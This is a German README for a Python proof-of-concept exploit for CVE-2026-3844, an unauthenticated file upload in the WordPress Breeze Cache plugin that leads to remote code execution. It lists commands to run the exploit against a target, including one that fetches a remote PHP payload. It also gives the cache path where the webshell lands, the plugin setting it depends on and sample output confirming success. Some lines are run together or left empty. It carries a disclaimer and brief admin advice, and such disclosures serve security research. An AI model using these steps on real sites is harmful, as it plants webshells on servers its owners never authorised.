
Python-Nachweis-of-Concept für CVE-2026-3844, einen nicht authentifizierten beliebigen Datei-Upload im WordPress Breeze Cache Plugin, der Remote-Code-Ausführung ermöglicht. Enthält Erkennung, Ausnutzung und Webshell-Verifizierung.
Dieses Repository enthält ein Python-Proof-of-Concept-Skript (PoC) zur Demonstration einer Unauthenticated Arbitrary File Upload-Schwachstelle, die das WordPress Breeze Cache Plugin <= 2.4.4 betrifft.
⚠️ Dieses Projekt ist ausschließlich für autorisierte Sicherheitstests, Bildungsforschung und defensive Validierung gedacht.
Die Schwachstelle missbraucht die Gravatar-Caching-Funktionalität von Breeze Cache, um vom Angreifer kontrollierte Dateien im WordPress-Cache-Verzeichnis zu speichern.
pycurltermcolorAbhängigkeiten installieren:
pip install pycurl termcolor
| Datei | Beschreibung |
|---|---|
CVE-2026-3844.py | Haupt-PoC-Exploit-Skript |
CVE-2026-3844.yaml | YAML-Vorlage/Konfiguration |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
Das Skript führt die folgenden Schritte aus:
Der hochgeladene Payload kann möglicherweise über folgenden Pfad zugänglich sein:
/wp-content/cache/breeze-extra/gravatars/
Eine erfolgreiche Ausnutzung kann von der folgenden Breeze-Einstellung abhängen:
Host Files Locally - Gravatars
Wenn die Funktion deaktiviert ist, können Exploit-Versuche fehlschlagen.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
Dieses Repository wird bereitgestellt für:
Verwenden Sie dieses Projekt nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testberechtigung haben.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Projekt verursacht werden.
Website-Administratoren sollten:
/wp-content/cache/ auf verdächtige Dateien überwachenDieses Proof-of-Concept wurde erstellt, um:
zu helfen, die Sicherheitsrisiken im Zusammenhang mit unsicheren Caching-Mechanismen und beliebigen Datei-Uploads zu verstehen.
Sicherheitsforschung / Bildungsprojekt